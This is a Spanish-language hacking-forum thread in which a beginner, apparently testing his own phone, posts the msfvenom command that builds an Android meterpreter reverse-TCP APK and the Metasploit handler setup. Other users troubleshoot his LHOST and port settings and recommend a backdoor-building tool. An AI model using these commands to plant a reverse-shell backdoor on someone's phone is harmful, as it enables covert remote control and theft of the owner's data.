Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: Szpilman en 8 Noviembre 2017, 10:56 am



Título: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit
Publicado por: Szpilman en 8 Noviembre 2017, 10:56 am
Hola, tengo un problema en Kali linux, estoy haciendo pruebas de seguridad en mi movil, :

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.xxxLPORT=5432 R > android.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8809 bytes

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
   Is the server running on host "localhost" (::1) and accepting
   TCP/IP connections on port 5432?
could not connect to server: Connection refused
   Is the server running on host "localhost" (127.0.0.1) and accepting
   TCP/IP connections on port 5432?

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.16.13-dev                         ]
+ -- --=[ 1697 exploits - 969 auxiliary - 299 post        ]
+ -- --=[ 500 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.xxx.xx.xxx
LHOST => 192.xxx.x.xxx
msf exploit(handler) > set LPORT 5432
LPORT => 5432
msf exploit(handler) > exploit
  • Exploit running as background job 0.
  • Started reverse TCP handler on 192.xx.xxx:5432
msf exploit(handler) >



Bien al escribir el comando exploit el problema aparece cuando se queda aqui y no continua.


  • Started reverse TCP handler on 192.xxx.x.xxx:5432
msf exploit(handler) >

Deberia aparecer otra linea en espera de activar en mi movil el archivo apk pero no aparece, no se que estoy haciendo mal.

Tambien he probado utilizando otra ip :
msf exploit(handler) > set LHOST 127.0.0.1
LHHOST => 127.0.0.1
msf exploit(handler) > set LPORT 5432
LPORT => 5432

Pero el resultado es este:

[-] Exploit failed: The following options failed to validate: LHOST.
  • Exploit completed, but no session was created.



Espero que alguien pueda ayudarme. Gracias


Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit
Publicado por: Avispon99 en 8 Noviembre 2017, 22:54 pm
Dices que estas probando con otras ip ??
Osea que te cambias de pc?.. por que te esta pidiendo la local host...

Lo estas haciendo desde una maquina virtual?
La host local que estas probando hace ping con la maquina victima?.. especifica mas datos de como estas haciendo el pentesting...


Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit
Publicado por: Szpilman en 9 Noviembre 2017, 00:11 am
Perdona estoy empezando en esto y quiero aprender, cuando hablo de dos ip me refiero a la ip local , que empieza por 192. etc. , el objetivo es mi movil, esta conectado a la misma wifi y otras lo tengo solo conectado a la red. Lo estoy haciendo desde virtual box. Que mas datos de puedo dar?


eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 08:00:27:f1:fc:39  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 158  bytes 27732 (27.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 404  bytes 31828 (31.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 404  bytes 31828 (31.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.203  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::80f4:c290:e05c:d1a  prefixlen 64  scopeid 0x20<link>
        ether 94:10:3e:ac:df:29  txqueuelen 1000  (Ethernet)
        RX packets 17289  bytes 13937479 (13.2 MiB)
        RX errors 0  dropped 5072  overruns 0  frame 0
        TX packets 15172  bytes 2466021 (2.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit
Publicado por: skorux en 14 Noviembre 2017, 22:50 pm
¿Has revisado el peso que tiene la aplicacion?
Hay ocasiones en las que el archivo de salida pesa 0 bytes, supongo que esto es un error durante la generacion del backdoor.

Te recomiendo que utilices esta herramienta para crear la aplicacion.
https://github.com/Screetsec/TheFatRat


Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit
Publicado por: Szpilman en 15 Noviembre 2017, 00:51 am
Gracias lo haré.


Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit
Publicado por: Rubeno953 en 25 Noviembre 2017, 12:50 pm
Quería saber si habías solucionado el problema ya que me pasa exactamente lo mismo.


Título: Re: kali linux test vulnerabilidad en mi movil problemas al iniciar exploit
Publicado por: yum-kax en 21 Diciembre 2017, 16:47 pm
Creo que no tenes mucha idea de lo que estas haciendo.

1ero el puerto 5432 aparentemente lo usa el msf para conectarse a una db interna.. con lo cual te recomendaria que uses otro si vas a usar una direccion de localhost.. hay 65534 puertos mas para utilizar.

2do ahora que recuerdo metasploit NO permite utilizar la ip 127.0.0.1.. podes usar la 127.0.0.2 ,3 ,4 ,5 etc..
aun asi, en el campo LHOST no va la ip 127.0.0.1 sino la 192.168.0.203.

Espero que se les solucione.

PD: Intenten interpretar lo que hace el metasploit, no solo copy paste de los tutoriales, sino la curva de aprendizaje deja de ser curva y solo terminamos(me incluyo en algunso casos :silbar: ) repitiendo lo q hay en la red en vez de razonar.

Saludos.-